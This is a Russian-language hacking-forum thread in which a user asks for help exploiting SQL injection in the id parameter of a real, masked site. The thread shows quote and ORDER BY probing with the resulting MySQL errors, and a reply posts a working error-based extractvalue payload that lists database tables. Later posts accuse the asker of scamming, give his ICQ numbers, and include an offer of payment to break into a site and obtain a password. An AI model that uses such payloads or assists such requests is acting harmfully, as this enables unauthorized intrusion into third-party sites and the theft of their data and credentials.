SQL - injection.

Discussion in 'Песочница' started by elvir, 19 Mar 2017.

  1. elvir

    elvir Banned

    Joined:
    30 Nov 2016
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь: есть сайт вида http://xxxx/?r=club/catalog/detail&id=12 при подстановки ковычки id=12' вылазит следующая ошибка:

    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = 201703' at line 1

    при попытки подобрать кол-во столбцов http://xxxx/?r=club/catalog/detail&id=12+order+by+1+--+ (или http://xxxx/?r=club/catalog/detail&id=12+order+by+1000+--+) появляется такая ошибка:

    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S22]: Column not found: 1054 Unknown column '1' in 'order clause'

    пробовал и - ставит впереди 12, и ковычку после 12 и делать запрос, всё равно не могу понять в чём проблема. Может кто подскажет, или как в SQLmape раскрутить, я так понял уязвимый параметр id.
     
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Таргет в лс. А вообще смотри на саму ошибку где ругается. В первом случае потеряна кавычка у строки '' AND date = [Вот здесь]201703' или наоборот последняя лишняя Во втором случае оператор order by считает 1 текстовой строкой.
     
    _________________________
    cat1vo and elvir like this.
  3. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Как обычно полный РоС выслал в ЛС. А если кому интересно то решается еррор бэйседом в ордер бай.
    Code:
    site.ru/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()   LIMIT 1,1))) -- -
    [​IMG]
     
    _________________________
    Gorev, leksadin and elvir like this.
  4. because

    because Elder - Старейшина

    Joined:
    21 Dec 2009
    Messages:
    148
    Likes Received:
    30
    Reputations:
    20
    ТС, КИДАЛА!!!
    БУДЬТЕ ОСТОРОЖНЫ!
     
  5. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Интересно в чем же? Он ничего не обещал
     
    _________________________
  6. because

    because Elder - Старейшина

    Joined:
    21 Dec 2009
    Messages:
    148
    Likes Received:
    30
    Reputations:
    20
    К этой теме не относится, товар продавал и после перевода сразу пропал.
     
  7. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Интересно на пруфы взглянуть. Ну а так, за такое модеры обычно банят.
     
    _________________________
  8. because

    because Elder - Старейшина

    Joined:
    21 Dec 2009
    Messages:
    148
    Likes Received:
    30
    Reputations:
    20
    Суи уже отписал)

    На 500р кинул :D
    ICQ - 712024700
    ICQ - 707394583

    Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар :D Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)
     
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Бывает
     
    _________________________
  10. tochka_zrenia

    tochka_zrenia New Member

    Joined:
    10 Mar 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ищу специалиста, проверить сайт на уязвимость типа sql injection с последующим получением пароля $$$
    пишите в личку
     
  11. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    А сайтик то чей?
    Твой?
     
    cat1vo likes this.